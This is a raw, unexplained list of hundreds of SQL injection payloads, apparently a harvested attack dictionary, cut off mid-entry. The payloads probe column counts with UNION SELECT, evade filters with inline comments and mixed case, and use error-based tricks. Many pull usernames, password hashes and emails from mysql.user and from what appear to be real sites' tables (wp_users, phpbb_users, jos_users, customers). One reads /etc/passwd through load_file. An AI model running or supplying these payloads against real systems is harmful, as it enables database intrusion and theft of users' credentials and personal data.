1,2,3,4,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 -- 999999999/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/**/from/**/mysql.user limit 0,1/* 999999999 union select 1,2,3,@@version,5-- 999999999 UNION SELECT 1,2,concat(user,password),4,5,6,7,8,9,10,11,12,13,14 from mysql.user/* 999999999 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 999999999 union select 1,2,concat_ws(0x3a,user,password),4,5,6 from mysql.user-- 999999999 union select 1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11/* 999999999'/**/UNION/**/SELECT/**/1,2,version(),4,user,6,7,8,9,10,11,12,13,14,15 from mysql.user/* 999999999 union select 1,concat_ws(0x3a3a,user(),version(),database()),3/* 999999999 union select 1,concat_ws(0x3a,id,user_name,user_pass),3 from itaf_user-- 999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,uname,pass),3 from koobi4_user/* 999999999 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6-- 999999999 union select 1,id,3,4,5,6,7,8 from member 999999999' union select 1,unhex(hex(table_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables/* 999999999/**/UNION/**/SELECT/**/concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,11 from mysql.user/* 999999999 union select convert(concat(version(),":",user(),":",database()),binary)/* 999999999 union select password from test.users/* 99999999 and 1=2 union select 1,concat(user(),char(58),version(),char(58),database()),3,4/* 99999999 union select 0,null,concat_ws(0x2F,user(),version()),2,3,null,null,null,4,null,5-- 99999999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,user(),database(),37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,version(),user,password,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107 from mysql.user/* 99999999 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,database(),version(),user()),13,14,15,16,17,18,19-- 99999999 union select 1,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(concat_ws(0x3a,username,password),1),1),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from admins limit 2,1/* 99999999 union select 1,2,3,4,5,concat_ws(0x3a,database(),version(),user()),7,8,9-- 99999999 union select 1,2,3,4,concat(nick,char(58),pw),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from adminuser/* 99999999 union select 1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7-- 99999999 union select 1,2,3,4,version(),6/* 99999999 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7-- -99999999 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6 -99999999 union select 1,2,3,concat_ws(version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15/* -99999999 union select 1,2,concat(0x223E,user(),0x3a,database(),0x3a,version(),0x3C212D2D)/* 99999999/**/UNION/**/SELECT/**/1,2,concat(user,0x3a,password),4,5 from mysql.user/* 99999999/**/UNION/**/SELECT/**/1,2,concat(user,password),4,5 from mysql.user/* 99999999 union select 1,2,concat_ws(0x3a,login,passwd) from mo_evm.us_users/* 99999999 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9-- 99999999 UNION SELECT 1,2,concat_ws(0x3a,username,userpasswd),4 from dbforms_user/* 99999999/**/UnIoN/**/SeLeCt/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM INFORMATION_SCHEMA.TABLES-- 99999999 union select 1,2,table_name,4,5,6,7,8,9,10,11 from information_schema.tables/* 99999999 union select 1,concat(user(),char(58),database(),char(58),version()),3,4,5,6,7,8 /* -99999999 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4,5/* 99999999 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6,7,8,9,10,11,12/* 99999999' union select 1,concat_ws(0x3a,user,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from users/* 99999999/*--*/UnIoN/*--*/SeleCt/*--*/1,group_concat(TABLE_NAME),3,4,5,6,7,8/*--*/FrOm/*--*/INFORMATION_SCHEMA.TABLES-- 99999999 union select 1,id,3,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,password,38 from users limit 0,1/* 99999999/**/UnIoN/**/SeLeCt/**/concat_ws(0x3a,user(),database(),version())-- -99999999 union select group_concat(table_name),2,3 from information_schema.tables-- 99999999 union select newsid,2,3,4 from news/* 99999999' union select unhex(hex(table_name)) from information_schema.tables limit 39,1/* 99999999 union select @@version,2,3,4,5,6,7,8-- 999999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,(SELECT concat(0x7e,0x27,Company.Cm_email,0x27,0x7e) FROM `db_westbyte_1`.Company Order by Cm_email LIMIT 0,1) -- 999999.9 union all select 0x6E6F,version(),0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F-- ## 999999.9unionallselect1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7 -- #999999.9'unionallselect1,concat(0x7e,0x27,concat_ws(0x3a,user(),version(),database()),0x27,0x7e),3,4 -- 999999.9 union all select concat(0x3d3e,unhex(Hex(cast(database() as char))),0x3c3d)-- 999999.9 union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e),0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9' UNION ALL SELECT concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e),0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9 UNION ALL SELECT (select concat(0x7e,0x27,0x7233646D3076335F68766A5F696E6A656374696F6E,0x27,0x7e) limit 0,1),0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -9999999 union select 0,1,2,3,concat(user_login,0x3a,user_pass,0x3a,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from wp_users-- - 9999999/**/union/**/select/**/0, aid,pwd,pwd,4/**/from nuke_authors/*where admin 1 0 2 -9999999' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws(0x3a,version(),user(),database()),21,22,23,24,25,26,27/* 9999999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from INFORMATION_SCHEMA.TABLES -- 9999999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from admins -9999999 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),database(),user())/* 9999999 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10-- 9999999 union select 1,2,3,4,5,6,7,concat(user(),0x7c,version(),0x7c,database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from users/* 9999999 union select 1,2,3,4,5,6,7,concat_ws(0x3a,database(),version(),user()),9,10,11,12,13,14,15,16-- 9999999 union select 1,2,3,4,5,6,7,hex(concat_ws(0x3A,version(),user(),database())),null,10-- 9999999 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23-- 9999999 union select 1,2,3,4,convert(concat(version(),char(58),user(),char(58),database()) using latin1),6,7/* 9999999 union select 1,2,3,4,group_concat(username,0x3a,userpass) from poll_user-- 9999999 union select 1,2,3,4,user(),6,7,8,9,10/* 9999999/**/union/**/select/**/1,2,3,concat(user,0x3a,password),5 from mysql.user/* 9999999 union select 1,2,3,concat_ws(0x3a,id,login,passw),5,6,7,8,9,10,11,12,13,14 from admins/* 9999999 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7 -- 9999999 union select 1,2,3,password,5,6,7,8,9,10,11,12 from user/* 9999999 union select 1,2,COLUMN_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71 from INFORMATION_SCHEMA.COLUMNS PROFILING WHERE TABLE_NAME LIKE char(112,104,112,97,100,115,95,99,108,105,101,110,116,115) limit 6,1-- 9999999 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 9999999 union select 1,2,concat_ws(0x3a,username,user_password) from srv12705_sh1for.infophpbb3_users-- 9999999 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 9999999' union select 1,2,concat_ws(char(58),name,username,password),concat(version(),char(58),user()),5,6,7,8,9 from user limit 2,2/* -9999999' UNION SELECT 1,2,CONCAT_WS('-',USER(),VERSION(),DATABASE()) -- 9999999 union select 1,2,convert(version(),binary),4/* 9999999 union select 1,2,database,4,5,6 -- 9999999 union select 1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14/* 9999999 UNION SELECT 1,concat(login,char(58),password,char(58),mail),0,4,5,6,7,8 FROM users/* 9999999 union select 1,concat(name,char(58),pass),concat_ws(char(58),version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from users/* 9999999 UNION SELECT 1,concat(user,0x3a,password),3,4,5,6,7 from mysql.user/* 9999999' union select 1,concat_ws(0x2F,user(),version() ,database())/* 9999999 union select 1,concat_ws(0x3a,password) from innovate.person_account/* 9999999' union select 1,concat_ws(0x3a,username,password),3 from emp3p_admins/* 9999999 union select 1,concat_ws(0x3b,version(),database(),user()) -- 9999999 union select 1,concat_ws(char(58),user(),database(),version())/* 9999999' union select 1,email,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from old_emails/* 9999999 UNION SELECT 1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* 9999999 union select 1,version(),3,user()/* 9999999 union select concat(login,0x3a,email,0x3a,pass,0x0b),2 from mavrikru_blogs.wblog_users limit 8740,500-- 9999999 UNION SELECT concat(user,0x3a,password) from mysql.user/* 9999999 union select concat_ws(0x3a,database(),user(),version())/* 9999999 union select concat_ws(0x3a,database(),version(),user()),2,3,4-- 9999999 union select concat_ws(0x3a,login,pass),2 from admin-- 9999999 union select concat_ws(0x3a,user(),database(),version()) -- -9999999/**/union/**/select/**/concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9 -- 9999999 union select concat_ws(0x3c666f6e7420636f6c6f723d27726564273e202d7c7c2d20,version(),user(),database())-- 9999999 union select unhex(hex(table_name)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables/* 9999999 union select unhex(hex(table_name)),2 from information_schema.tables limit 24,1/* 9999999 UNION SELECT user,password from mysql.user limit 0,1/* 9999999 UNION SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/* 9999999 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/* 999999' and 0 union select 1,2,concat_ws(0x3a ,user(),database(),version()),4/* -999999 union select 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0 from chat_admin-- 999999' union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,convert(concat(USER(),char(58),VERSION()) using latin1),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,convert(concat(DATABASE(),char(58)) using latin1),50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69/* 999999 union select 0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/* 999999 union select 0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3/* 999999 union select 0,load_file(0x2F6574632F706173737764),2,3,4,5,6,7,8,9,10/* 999999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 999999 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),database(),user())/* 999999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex(hex(version())),18,19,20,21,22,23,24,25/* 999999 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(user,0x3a,password),17 from mysql.user/* 999999 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from information_schema.tables limit 17,1-- 999999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,user(),database(),version()),15,16 -- 999999 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x203B20,unhex(hex(user())),unhex(hex(database())),unhex(hex(version()))),12,13,14,15,16,17,18,19,20,21,22 -- 999999 UNION SELECT 1,2,3,4,5,6,7,unhex(hex(version()))/* 999999 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 999999 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17-- 999999 union select 1,2,3,concat_ws(0x3a,login,password),5,6,7,8,9 from users limit 0,1/* 999999 union select 1,2,3,concat_ws(0x3a ,user(),database(),version()),5,6,7,8,9-- -999999 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -999999 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 999999 union select 1,2,3,database(),5,user,user(),version(),password,10,11,12,13,14,15,16,17,18,19,20 from mysql.user/* 999999' union select 1,2,concat(nick,0x3a,pass),4,5,6 from users/* 999999 union select 1,2,concat(user(),0x0b,version(),0x0b,database()),4,5,6,7,8-- 999999 union select 1,2,concat(version(),0x2F ,database(),0x2F,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -999999 union select 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5/* 999999 union select 1,2,concat_ws(0x3a,admin_login,admin_password),4,5,6,7 from admins/* 999999' union select 1,2,concat_ws(0x3a ,user(),database(),version()),4,5,6,7,8,9/* 999999 UNION SELECT 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15/* -999999 union select 1,2,table_name from information_schema.tables limit 1,1/* 999999 union select 1,concat(status,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users/* 999999 union select 1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14/* '-999999 union select 1,concat(user,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from mysql.user LIMIT 1,2/* 999999 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* 999999 union select 1,concat_ws(0x3a,version(),user() ,database(),@@version_compile_os),3,4,5,6,7,8-- 999999 union select 1,concat_ws(0x3b, user(),database(),version()),3,4,5,6,7/* 999999 union select 1,concat_ws(0x3,user,password),concat_ws(0x3,user(),database(),version()),4,5,6,7 from mysql.user -- -999999 union select 1,user(),version(),database(),concat_ws(0x3a,LOGIN,PASS) from br_users/* 999999 union select 1,version(),3,4,5,6 -- 999999 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* 999999 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(Version()),0x71),0x71)/* -999999 union select concat(name,0x3a,password),2,3 from users/* 999999 union select concat_ws(0x3a,database(),version(),user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 999999/* */union/* */select/* */concat_ws(0x3a,user(),version(),database()),2,3 -- 999999 union select concat_ws(0x3a,version(),database(),user()),2,3/* 999999' UNION SELECT concat_ws(0x3a,version(),user(),database()),2,3,4,5,6/* 999999' union select unhex(hex(concat_ws(0x3a,version(),table_name))) from information_schema.tables limit 26,1/* 999999 union select username,password,3,4,5,6,7,8,9,10,11,12 from users/* 99999 and 1=cast((SELECT inet_server_port()||chr(58)||current_user||chr(58)||version()) as int) 99999 or(1,1)=(select count(0),concat((select concat_ws(0x3a,user(),version(),database()) from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- -99999 UNION SELECT 0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e) FROM jos_users-- 99999 union select 1111,concat_ws(0x3a,version(),user(),database()),3333,4444/* -99999 union select 1,2,3, 99999' UNION SELECT 1,2,3,4,5/* 99999 union select 1,2,3,4,5,0x6964,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from utech_build.relCommonBaseOrder_Material/* 99999 union select 1,2,3,4,5,6,7,8,9/* 99999 /*!UNION*/ SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- 99999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/* 99999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/* 99999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56/* 99999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,concat_ws(0x3a,user,password)r,36 from mysql.user/* -99999' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,table_name,35,36 from information_schema.tables/* 99999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1999,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/* -99999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,cast(version() as binary),cast(database() as binary),cast(user() as binary))-- -99999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24/* 99999 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,database(),user(),version()),14,15 99999 union select 1,2,3,4,5,6,7,8,9,10,aes_decrypt(aes_encrypt(version(),0x71),0x71),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45/* 99999 union select 1,2,3,4,5,6,7,8,9,10,VERSION(),12/* 99999' UNION SELECT 1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(pass, 0x71),0x71),10,11,12,13,14,15,16 from admin/* 99999 union select 1,2,3,4,5,6,7,version(),9/* 99999' union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15/* -99999 union select 1,2,3,4,5,6,concat_ws(0x3a,customerID,Login,cust_password,Email,first_name,last_name,subscribed4news,custgroupID,addressID,reg_datetime,ActivationCode,CID),8,9,10,11,12,13,14,15 from SS_customers/* 99999' union select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12/* 99999 union select 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables limit 17,1-- -99999 union select 1,2,3,4,5,6,version(),8,9,10,11-- -99999 union select 1,2,3,4,5,6,version(),8,9,10,11/* 99999 union select 1,2,3,4,5,6,VERSION(),8,9,10,11,12,13,14,15,16,17,18,19,20,21/* 99999 union select 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -99999 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9/* 99999 union select 1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from information_schema.tables limit 0,1/* 99999 union select 1,2,3,4,concat_ws(0x3a,user_name,password),6,7,8,9,10,11,12 from users/* 9-999.9 union select 1,2,3,4,group_concat(0x0b,table_name),6,7,8,9,10,11 from information_schema.tables-- -99999 union select 1,2,3,4,id,6,7,8,9,10,concat_ws(0x3a,username,password,email),12,13 from users/* -99999 union select 1,2,3,4,unhex(hex(version())),6/* 99999 union select 1,2,3,4,VERSION(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/* 99999 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17 from clients-- 99999 union select 1,2,3,4,VERSION(),6,USER(),DATABASE(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/* -99999 union select 1,2,3,AES_DECRYPT(AES_ENCRYPT(USER(), 0x71),0x71),5,6,7,8,9,10,11/* -99999 union select 1,2,3,concat_ 99999 union select 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11 -99999 union select 1,2,3,concat_ws(0x3a,id,username,password),5,6,7 from users/* -99999 union select 1,2,3,concat_ws(0x3a,login,password,access_level),5 from users-- -99999 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5/* 9-999.9 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5-- 99999 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15/* 99999 union select 1,2,3,convert(concat(version(),0x3a,user(),0x3a,database()),binary),5,6,7,8,9,10,11/* -99999 union select 1,2,3,cos(pi()/10),5,6,7,8,9/* 99999 union select 1,2,concat(0x3a3a,user(),0x3a3a,version(),0x3a3a,database()),4,5,6,7,8,9,10,11/* 99999 union select 1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8 from customers-- 99999 union select 1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8 from customers/* -99999 union select 1,2,concat(login,0x3a,password),4,5,6,7,8 from users-- -99999 union select 1,2,concat(login,0x3a,password),4,5,6,7,8 from users/* 99999 union select 1,2,concat(user,char(58),password),4,5,6,7,8,9,10,11,12,13 from mysql.user/* 99999 union select 1,2,concat(version(),char(58),user(),char(58),database()),4,5,6,7,8,9,10,11 /* - 99999 union select 1,2,concat_ws(0x3a,ADMINISTRATOR_ID,LOGIN,PASSWORD_MD5),4,5,6,7,8,9,10, 11,12,13,14 from ADMINISTRATOR/* -99999 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6 from amx_webadmins 99999 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10 FROMusers -- 99999 union select 1,2,concat_ws(0x3a,username,password,email),4,5,6 from user limit 2,1/* -99999' union select 1,2,concat_ws(0x3a,user,password) from mysql.user/* -99999 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- 99999 union select 1,2,password,4,5,6,7 from members 99999 union select 1,2,unhex(hex(version()))/* -99999 UNION SELECT 1,2,user() -- 99999 union select 1,2,user,4,5,6,7,password,9,10,11,12,13 from mysql.user/* 99999 union select 1,2,user_name,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin/* -99999 union select 1,2,user(),version(),database()/* 99999 union select 1,2,version()/* 9-999.9 union select 1,2,version(),4,5,6,7,8,9,10,11,12-- 99999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* 99999' union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* 99999 union select 1,2,version() from news-- 99999 union select 1,2,version(),user(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* 99999' union select 1,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4 from users limit 1,1/* 99999' union select 1,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71)/* 99999 union select 1,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),3,4,5,6,7,8,9,10 from phpbb_users limit 1,1/* -99999 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7 99999 UNIOn SELECT 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13 -- -99999 UNION SELECT 1,concat_ws(0x3a,email,parol),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from objav/* 99999 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4/* 99999 union select 1,concat_ws(0x3a,user(),database(),version()),3,4/* 99999 union select 1,concat_ws(0x3a,username,password),3,4 from baltic_phpmotion.admin/* -99999 union select 1,concat_ws(0x3a,user,password),3 from mysql.user/* 99999' union select 1,concat_ws(0x3a,version()),3/* 99999 union select 1,concat_ws(0x3b, user(),database(),version()),3,4,5,6-- 99999 union select 1,concat_ws(0x40,host,user,password,file_priv,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from mysql.user/* 99999' union select 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables group by table_schema limit 1,1 -- 99999 union select 1,username,3,password,5,6,7,8 from users-- 99999 union select 1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* 99999 union select 1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* 99999 union select 1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* 99999 union select 1,version(),user()/* 99999 union select 1,version(),user(),database(),5,6,7,8,9/* 99999 union select concat_ws(0x3a,database(),version(),user()),2-- 99999 union select concat_ws(0x3a,login,pwd),2 from rabota_1.users/* 99999' union select concat_ws(0x3a,user(),database(),version()),2,3/* 99999 union select concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15/* 99999 union select concat_ws(0x3a,username,password,email),2,3,4,5,6,7,8,9,10,11,12 from users limit 2,1/* 99999' union select concat_ws(0x3a,username,password) from onthec5_main.users limit 0,1/* 99999 union select concat_ws(0x3a,user,password),2,3 from mysql.user/* 99999 union select concat_ws(0x3a,version(),user() ,database(),@@version_compile_os),2,3,4,5,6,7-- -99999 union select concat_ws(char(58),DATABASE(),USER(),VERSION())-- 99999) union select unhex(hex(version()))/* 99999) union select version()/* 99999 union select VERSION(),2,3/* -99999 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -9999 and 1=2 union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),@@version_compile_os),0x71),0x71),3,4,5,6,7,8,9,10,11,12-- 9999 or 1 group by concat(concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),rand(0)|0) having min(0)-- 9999 or 1 group by concat((select email from 2on2hockeyDB limit 0,1),rand(0)|0) having min(0)-- 9999 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b), 1, 70), floor(rand(0)*2)))-- -9999 union all select 1,2,3,concat(user,char(58),pass,0x7c,0x7c),5,6 from users-- -9999 union all select 1,2,3,concat(username,char(58),password) from users-- -9999 union all select 1,2,concat(user_name,char(58),user_password),null,5,6,7,null,9,10,11,12,13 from users-- -9999 union all select 1,2,convert(concat_ws(char(58),username,password) using utf8),4,null,6,null,8,9 from login-- -9999 union all select 1,concat_ws(char(58),user,password),3,4,5 from mysql.user-- 9999 union select 0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a),3,4,5,6,7,8/* 9999 union select 0,concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10/* 9999 union select 0,concat_ws(char(32,32),version(),user(),database()),username, CHAR(32,58,32), user_password),2,3,4,5-- -9999 union select 1,2,3,4,5,6* 9999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(user(),0x3a,version(),0x3a,database()),26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/* 9999 union select 